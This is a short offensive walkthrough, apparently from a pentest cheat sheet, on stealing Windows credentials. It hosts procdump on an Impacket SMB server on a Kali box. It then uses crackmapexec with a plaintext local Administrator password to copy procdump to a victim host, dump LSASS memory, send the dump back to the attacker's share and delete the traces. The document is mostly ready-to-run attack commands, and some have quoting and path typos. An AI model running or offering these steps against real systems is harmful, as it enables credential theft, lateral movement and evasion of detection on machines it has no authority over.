First, setup a listening SMB server on your Kali box (in this case, 192.168.55.60):
mkdir /share
cd /share
wget https://live.sysinternals.com/procdump64.exe
screen -R smb
/opt/impacket/examples/smbserver.py -smb2support share /share
Then, escape the screen session and run the following CME commands to copy procdump over to the victim machine, create the dump, take the dump, then delete procdump.exe and the residual dump file:
crackmapexec smb 192.168.55.220 -u Administrator -p ‘Welkom01!’ –local-auth –exec-method smbexec -x ‘copy “\192.168.55.60\share\procdump64.exe” “c:\users\public\procdump64.exe”’
crackmapexec smb 192.168.55.220 -u Administrator -p ‘Welkom01!’ –local-auth –exec-method smbexec -x ‘c:\users\public\procdump64.exe -accepteula -ma lsass.exe c:\users\public\lsass.dmp’
crackmapexec smb 192.168.55.220 -u Administrator -p ‘Welkom01!’ –local-auth –exec-method smbexec -x ‘copy “c:\users\public\lsass.dmp” “\192.168.55.60\share"’
crackmapexec smb 192.168.55.220 -u Administrator -p ‘Welkom01!’ –local-auth –exec-method smbexec -x ‘del “c:\users\public\lsass.dmp”
crackmapexec smb 192.168.55.220 -u Administrator -p ‘Welkom01!’ –local-auth –exec-method smbexec -x ‘del “c:\users\public\procdump64.exe”
Command:See commands